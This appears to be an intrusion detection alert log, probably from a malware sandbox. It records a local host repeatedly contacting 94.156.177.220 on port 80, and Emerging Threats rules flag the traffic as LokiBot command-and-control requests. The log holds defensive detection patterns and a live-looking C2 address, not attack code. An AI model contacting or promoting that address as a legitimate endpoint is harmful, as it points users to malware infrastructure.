2024-10-27T08:50:16.063034+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49706	TCP
2024-10-27T08:50:17.334761+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49707	TCP
2024-10-27T08:50:18.462464+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49708	TCP
2024-10-27T08:50:19.581587+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49711	TCP
2024-10-27T08:50:20.695628+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49714	TCP
2024-10-27T08:50:21.813380+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49718	TCP
2024-10-27T08:50:22.953855+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49720	TCP
2024-10-27T08:50:24.080454+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49726	TCP
2024-10-27T08:50:25.257092+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49732	TCP
2024-10-27T08:50:26.366084+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49742	TCP
2024-10-27T08:50:27.494385+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49749	TCP
2024-10-27T08:50:28.670968+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49755	TCP
2024-10-27T08:50:29.797186+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49761	TCP
2024-10-27T08:50:31.110508+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49771	TCP
2024-10-27T08:50:32.254670+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49778	TCP
2024-10-27T08:50:33.393935+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49784	TCP
2024-10-27T08:50:34.848312+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49792	TCP
2024-10-27T08:50:35.966327+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49798	TCP
2024-10-27T08:50:37.088869+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49809	TCP
2024-10-27T08:50:38.187703+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49815	TCP
2024-10-27T08:50:39.341013+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49821	TCP
2024-10-27T08:50:40.462994+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49829	TCP
2024-10-27T08:50:41.623354+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49838	TCP
2024-10-27T08:50:42.732921+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49844	TCP
2024-10-27T08:50:44.897635+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49850	TCP
2024-10-27T08:50:46.018781+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49861	TCP
2024-10-27T08:50:47.152742+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49867	TCP
2024-10-27T08:50:48.297660+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49873	TCP
2024-10-27T08:50:49.451834+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49882	TCP
2024-10-27T08:50:50.562944+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49889	TCP
2024-10-27T08:50:51.674467+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49895	TCP
2024-10-27T08:50:52.785982+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49901	TCP
2024-10-27T08:50:53.913693+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49912	TCP
2024-10-27T08:50:55.028582+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49918	TCP
2024-10-27T08:50:56.160155+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49924	TCP
2024-10-27T08:50:57.280490+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49931	TCP
2024-10-27T08:50:58.420622+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49940	TCP
2024-10-27T08:50:59.549634+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49947	TCP
2024-10-27T08:51:00.683946+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49953	TCP
2024-10-27T08:51:02.099620+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49964	TCP
2024-10-27T08:51:03.225409+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49970	TCP
2024-10-27T08:51:04.567369+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49976	TCP
2024-10-27T08:51:05.702237+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49982	TCP
2024-10-27T08:51:06.832174+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49992	TCP
2024-10-27T08:51:07.974921+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	49998	TCP
2024-10-27T08:51:09.114213+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50005	TCP
2024-10-27T08:51:10.287090+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50015	TCP
2024-10-27T08:51:11.426973+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50019	TCP
2024-10-27T08:51:12.583566+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50027	TCP
2024-10-27T08:51:13.731892+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50028	TCP
2024-10-27T08:51:14.892433+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50029	TCP
2024-10-27T08:51:16.041623+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50030	TCP
2024-10-27T08:51:18.151497+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50031	TCP
2024-10-27T08:51:19.314409+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50032	TCP
2024-10-27T08:51:20.467042+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50033	TCP
2024-10-27T08:51:21.623834+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50034	TCP
2024-10-27T08:51:22.754368+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50035	TCP
2024-10-27T08:51:23.878068+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50036	TCP
2024-10-27T08:51:25.032793+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50037	TCP
2024-10-27T08:51:26.187213+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50038	TCP
2024-10-27T08:51:27.350814+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50039	TCP
2024-10-27T08:51:28.485166+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50040	TCP
2024-10-27T08:51:29.608903+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50041	TCP
2024-10-27T08:51:30.876689+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50042	TCP
2024-10-27T08:51:32.019216+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50043	TCP
2024-10-27T08:51:33.163438+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50044	TCP
2024-10-27T08:51:34.335225+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50045	TCP
2024-10-27T08:51:35.468657+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50046	TCP
2024-10-27T08:51:36.727006+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50047	TCP
2024-10-27T08:51:37.955750+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50048	TCP
2024-10-27T08:51:39.134567+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50049	TCP
2024-10-27T08:51:40.261845+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50050	TCP
2024-10-27T08:51:41.385746+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50051	TCP
2024-10-27T08:51:42.539849+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50052	TCP
2024-10-27T08:51:43.674138+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50053	TCP
2024-10-27T08:51:44.799506+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50054	TCP
2024-10-27T08:51:46.021732+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50055	TCP
2024-10-27T08:51:47.148641+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50056	TCP
2024-10-27T08:51:48.601144+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50057	TCP
2024-10-27T08:51:49.784943+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50058	TCP
2024-10-27T08:51:50.943802+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50059	TCP
2024-10-27T08:51:52.092366+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50060	TCP
2024-10-27T08:51:53.285458+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50061	TCP
2024-10-27T08:51:54.438687+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50062	TCP
2024-10-27T08:51:55.649813+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50063	TCP
2024-10-27T08:51:56.786328+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50064	TCP
2024-10-27T08:51:58.240106+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50065	TCP
2024-10-27T08:51:59.415459+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50066	TCP
2024-10-27T08:52:00.565164+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50067	TCP
2024-10-27T08:52:01.720954+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50068	TCP
2024-10-27T08:52:03.103857+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50069	TCP
2024-10-27T08:52:04.235519+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50070	TCP
2024-10-27T08:52:06.207503+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50071	TCP
2024-10-27T08:52:07.349781+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50072	TCP
2024-10-27T08:52:08.749718+0100	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.5	50073	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T08:50:16.057099+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:17.329127+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:18.456661+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:19.575558+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:20.689379+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:21.807779+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:22.948231+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:24.074551+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:25.251158+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:26.359660+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:27.488642+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:28.665275+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:29.791485+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:31.109988+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:32.248566+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:33.388049+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:34.847905+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:35.960696+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:37.083298+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:38.181996+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:39.332352+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:40.457308+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:41.617558+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:42.727221+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:44.891990+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:46.013060+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:47.147006+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:48.291817+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:49.446252+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:50.557159+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:51.668504+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:52.780314+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:53.905837+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:55.022586+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:56.154424+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:57.274912+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:58.414985+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:59.543884+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:51:00.678058+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:51:02.093915+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:03.219814+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:04.561746+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:05.696490+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:06.826417+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:07.969091+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:09.108310+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:10.281408+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:11.421296+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:12.576722+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:13.725956+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:14.886637+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:16.035982+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:18.145683+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:19.308400+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:20.460366+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:21.617533+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:22.748835+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:23.872533+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:25.027152+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:26.181621+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:27.344814+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:28.479199+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:29.603188+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:30.871101+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:32.013513+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:33.157667+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:34.329371+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:35.462045+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:36.719219+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:37.950107+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:39.128508+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:40.256100+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:41.380145+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:42.532682+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:43.667954+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:44.793693+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:46.014878+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:47.142826+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:48.595470+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:49.779117+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:50.937949+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:52.086390+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:53.279747+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:54.432804+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:55.643652+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:56.780487+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:58.233352+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:59.409762+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:52:00.558856+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:52:01.715149+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:03.098066+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:04.229607+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:06.200494+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:07.344016+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:08.623892+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50073	94.156.177.220	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T08:50:16.057099+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:17.329127+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:18.456661+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:19.575558+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:20.689379+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:21.807779+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:22.948231+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:24.074551+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:25.251158+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:26.359660+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:27.488642+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:28.665275+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:29.791485+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:31.109988+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:32.248566+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:33.388049+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:34.847905+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:35.960696+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:37.083298+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:38.181996+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:39.332352+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:40.457308+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:41.617558+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:42.727221+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:44.891990+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:46.013060+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:47.147006+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:48.291817+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:49.446252+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:50.557159+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:51.668504+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:52.780314+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:53.905837+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:55.022586+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:56.154424+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:57.274912+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:58.414985+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:59.543884+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:51:00.678058+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:51:02.093915+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:03.219814+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:04.561746+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:05.696490+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:06.826417+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49992	94.156.177.220	80	TCP
